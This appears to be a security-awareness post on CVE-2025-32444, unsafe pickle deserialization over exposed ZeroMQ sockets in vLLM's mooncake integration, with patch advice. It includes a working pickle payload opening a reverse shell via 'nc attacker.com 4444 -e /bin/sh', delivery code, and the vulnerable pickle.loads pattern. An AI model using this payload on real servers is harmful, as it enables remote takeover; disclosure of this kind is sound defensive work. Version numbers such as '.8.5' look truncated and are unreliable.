A new security vulnerability, CVE-2025-32444, impacts certain versions of vLLM – a popular high-throughput and memory-efficient inference and serving engine for large language models (LLMs). This issue specifically affects vLLM instances integrating with mooncake between versions .6.5 and prior to .8.5. The vulnerability arises from insecure use of Python’s pickle serialization protocol over *unsecured* ZeroMQ sockets.
This post will explain what happened, how it can be exploited, and how to protect your vLLM deployments.
What is the Vulnerability?
The bug is caused by pickling (serializing) data structures with Python’s pickle module, and sending them over ZeroMQ sockets that listen on all network interfaces and are not secured. Pickle is powerful, but dangerous—it allows deserialization of arbitrary Python objects, so untrusted input can lead to code execution.
In the affected vLLM/mooncake integration, ZeroMQ sockets are created that accept external connections and transport pickled objects. If an attacker can connect to these sockets, they can send a specially crafted pickle payload to execute code on the vLLM server.
Exploitation Details
If an attacker can reach a vulnerable vLLM instance’s ZeroMQ socket, they can achieve remote code execution (RCE). Here’s a high-level walk-through.
1. Craft a Malicious Pickle Payload
The attacker creates a Python pickle that runs their chosen code during deserialization.
Example: reverse shell payload
import pickle
import os
class Exploit(object):
def __reduce__(self):
return (os.system, ('nc attacker.com 4444 -e /bin/sh',))
payload = pickle.dumps(Exploit())
2. Deliver Payload to Exposed Socket
The attacker connects to the open ZeroMQ socket (exposed to the network) and sends the payload. Example delivery using pyzmq:
import zmq
context = zmq.Context()
socket = context.socket(zmq.REQ)
socket.connect("tcp://victim_ip:vulnerable_port")
socket.send(payload)
# Normally receive response, but the code has now executed
3. Command Execution
When the vLLM mooncake server deserializes the pickle, it executes the attacker’s command (e.g., creates a reverse shell, runs malware, etc).
Vulnerable code example
import zmq
import pickle
context = zmq.Context()
socket = context.socket(zmq.REP)
socket.bind("tcp://...:12345") # Exposed on all interfaces
while True:
message = socket.recv()
# UNSAFE deserialization!
obj = pickle.loads(message)
# ... process obj
Patch Now: Upgrade to vLLM version .8.5 or later
References
- GitHub vLLM Security Advisory
- CVE record for CVE-2025-32444 (may take time to appear)
- ZeroMQ Security Considerations
Conclusion
CVE-2025-32444 is a serious vulnerability in vLLM’s mooncake integration caused by unsafe pickle usage over unauthenticated sockets open to external access. If you use vLLM with mooncake on affected versions, you must patch immediately by updating to v.8.5 or newer. Never trust pickle over the network, especially on externally reachable sockets.
Always audit server configurations and update your dependencies regularly.
If you run vLLM, check your version and integration settings now, and spread the word in your team. Stay safe!
*This post was created uniquely for your security awareness. Please share responsibly!*
Timeline
Published on: 04/30/2025 01:15:51 UTC
Last modified on: 05/28/2025 19:12:58 UTC